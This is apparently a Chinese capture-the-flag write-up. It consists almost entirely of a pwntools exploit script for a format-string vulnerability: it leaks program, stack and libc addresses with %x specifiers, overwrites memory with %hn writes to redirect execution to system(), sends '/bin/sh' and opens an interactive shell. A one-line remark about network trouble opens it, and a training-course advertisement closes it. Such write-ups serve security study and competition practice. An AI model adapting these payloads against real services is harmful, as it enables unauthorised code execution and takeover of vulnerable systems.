这道题的解法需要接收大量数据，前期一直网络不好没法实现，一直怀疑自己的解不正确，最后等晚上条件好了再突破成功。

say(1, '%3$x,%5$x,%8$x,%11$x,')

proc_base = int(p.recvuntil(',',drop=True),16) - 0x8F3

stack_addr = int(p.recvuntil(',',drop=True), 16)

print 'stack_addr ', hex(stack_addr)

stack_base = int(p.recvuntil(',',drop=True), 16) - 0x40

libc_base = int(p.recvuntil(',',drop=True), 16) - (0xf7e1b637 - 0xf7e03000)

print 'proc_base ',hex(proc_base)

print 'stack_base ', hex(stack_base)

print 'libc_base ', hex(libc_base)

libc.address = libc_base

target = (stack_base + 11 *4 + 0x10) & 0xffff

# 0xffffd43c -> system

print 'system ', hex(libc.symbols['system'])

payload = '%' + str(target) + 'c%5$hn'

print len(payload)

say(1, payload)

say(1, '%53$x')

target2 = (libc.symbols['system']) & 0xffff

payload = '%' + str(target2) + 'c%53$hn'

say(1, payload)

payload = '%' + str(target + 2) + 'c%5$hn'

say(1, payload)

target2 = (libc.symbols['system']) // 0x10000

payload = '%' + str(target2) + 'c%53$hn'

say(1, payload)

payload = '%' + str(target + 8) + 'c%5$hn'

say(1, payload)

target2 = (proc_base + 0x0200C) & 0xffff

payload = '%' + str(target2) + 'c%53$hn'

say(1, payload)

payload = '%' + str(target + 10) + 'c%5$hn'

say(1, payload)

target2 = (proc_base + 0x0200C) // 0x10000

payload = '%' + str(target2) + 'c%53$hn'

say(1, payload)

say(1, '/bin/sh\x00')

p.sendlineafter("Choice:", str(2))

#for i in range(4):

# payload = '%' + str(libc.symbols['system']) + 'c%4$n'

# print len(payload)

# say(payload)

#debugf('bp 0x565558F3\nbp 0x56555951')

p.interactive()

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课